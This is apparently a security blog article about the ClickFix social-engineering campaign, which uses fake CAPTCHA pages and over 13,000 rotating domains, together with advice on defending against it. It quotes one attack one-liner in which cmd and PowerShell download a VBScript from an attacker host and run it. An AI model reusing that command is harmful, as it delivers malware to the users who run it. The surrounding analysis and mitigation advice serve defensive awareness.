In mid-2025, security researchers noticed a sudden, coordinated increase in malicious domain registrations. Over 13,000 unique domains were linked to an emerging campaign known as ClickFix. Because this operation relies on user interaction rather than software flaws, it spreads rapidly and evades most automated filters.
The technique combines social engineering with automation. As a result, it creates a dangerous intersection between user trust and large-scale domain abuse. This article explores how the ClickFix campaign works, why it has become so effective, and how organizations can limit its impact.
What Is the ClickFix Campaign?
ClickFix is a browser-based social engineering attack. Victims first encounter what looks like a legitimate CAPTCHA test. Immediately afterward, the page asks them to copy and paste a short command into a terminal or console window. Because the prompt appears harmless, many users comply. However, that simple action downloads and executes hidden malware within seconds.
Unlike classic phishing that steals credentials, ClickFix manipulates behavior. It convinces the target to run malicious code voluntarily. Consequently, it bypasses email gateways, antivirus filters, and browser warnings that depend on detecting automatic downloads.
Security advisories, including one from the U.S. Department of Health and Human Services, describe how these prompts mimic real verification pages. Meanwhile, a detailed report from Group-IB explains how attackers manipulate browser workflows and clipboards to deliver payloads discreetly.
Domain Infrastructure and Scale
Because ClickFix depends on thousands of active URLs, attackers built an automated registration system that continuously creates and retires domains. Through API access and disposable payment methods, each malicious site stays online only briefly. As a result, detection tools struggle to keep pace.
Moreover, roughly a quarter of the observed domains rely on Cloudflare infrastructure, while others use hundreds of smaller providers scattered worldwide. This diversity complicates any large-scale blocking effort. Some domains even exploit forgotten subdomains or outdated academic sites. By hiding within known networks, these actors gain additional credibility.
Furthermore, the registration footprint extends across multiple regions, including the United States, Germany, Indonesia, and Brazil. Therefore, even if one registrar takes action, others continue to enable the campaign’s spread.
Attack Flow and Tactics
The ClickFix attack sequence follows a predictable pattern. First, the victim arrives on a compromised or newly registered domain. Next, the page displays a CAPTCHA prompt claiming to verify that the visitor is human. When the user clicks through, a hidden script copies a command to the clipboard. Then, an instruction appears, urging the visitor to paste it into a console to “continue.”
Once executed, the command downloads and launches a secondary payload often a VBScript or PowerShell snippet. For example:
cmd /c start /min powershell -Command curl.exe -s https://cf-unstable.mediacaptcha.txt -o %TEMP%\captcha.vbs; Start-Process %TEMP%\captcha.vbs
Because the process relies entirely on user interaction, most security tools see no abnormal behavior until it is too late. Furthermore, attackers frequently rotate URLs or rename scripts to avoid detection.
Why Large-Scale Domain Abuse Works
The success of this campaign rests on three key factors: low cost, automation, and speed. Domain names are inexpensive, so registering thousands barely impacts an attacker’s budget. In addition, modern registrar APIs simplify creation and deletion cycles. Consequently, defenders find themselves chasing an ever-changing list of hostnames.
Moreover, reputation-based filters depend on historical data. Since ClickFix domains rarely live more than a few days, blacklists remain perpetually behind. Attackers also disguise their registrations by using ordinary TLDs and familiar hosting providers, which makes suspicious patterns harder to identify.
Academic research confirms this reality. For instance, a study titled “Registration, Detection, and Deregistration” demonstrates that phishing and malware domains often remain active for days even after discovery.
At the same time, DNS dynamic update vulnerabilities can allow adversaries to hijack zones or redirect traffic without registering new domains at all.
Historically, large-scale domain abuse has powered major phishing and malware waves. For example, earlier research into malicious URL campaigns revealed that attackers create thousands of disposable sites during every operation. As a result, traditional detection techniques rarely prevent the first wave of infections.
Defense Strategies and Mitigation
Because the ClickFix campaign depends on human behavior, defense requires both technical and organizational measures.
At the Domain and DNS Level:
Organizations should monitor new domain registrations that resemble their brands or product names. In addition, integrating domain reputation feeds and automated look-alike detection can expose suspicious activity early. Collaboration with registrars enables faster takedowns, while DNS filtering helps block entire domain clusters proactively.
At the Endpoint and Network Layer:
Endpoint Detection and Response systems must block unauthorized PowerShell or script execution. Furthermore, administrators should create policies that flag clipboard-triggered downloads. When combined with browser hardening and content security policies, these rules limit execution chains before they succeed.
At the Organizational Level:
Security awareness training remains essential. Users should understand that no legitimate service ever requires pasting commands from a web page into a terminal. Additionally, applying least-privilege principles reduces potential damage if someone executes a malicious script. Finally, clear incident response playbooks streamline takedown requests and external coordination.
The ClickFix campaign demonstrates how social engineering, when scaled through automation, can rival advanced malware in effectiveness. Although the method appears simple, its execution across 13,000 domains proves how persistence and volume can overcome traditional defenses.
Therefore, defenders must look beyond endpoint alerts and examine domain-level intelligence. By combining monitoring, DNS control, behavioral analytics, and user education, organizations can finally close the gap attackers exploit so effectively.
FAQs
What exactly is ClickFix?
ClickFix is a browser-based attack that tricks users into pasting and executing malicious code under the guise of CAPTCHA validation.
How can attackers manage 13,000 domains?
They use automated scripts and registrar APIs to create, update, and remove domains in bulk, ensuring constant availability.
Can defenders block rotating domains effectively?
Yes. Combining domain-reputation feeds, DNS filtering, and registrar partnerships allows near-real-time blocking.
Which malware families use ClickFix?
ClickFix has delivered infostealers, remote access trojans, and loader scripts tied to known threat groups.
3 thoughts on “ClickFix’s Domain Army: 13,000+ Domains, Massive Attack Surface”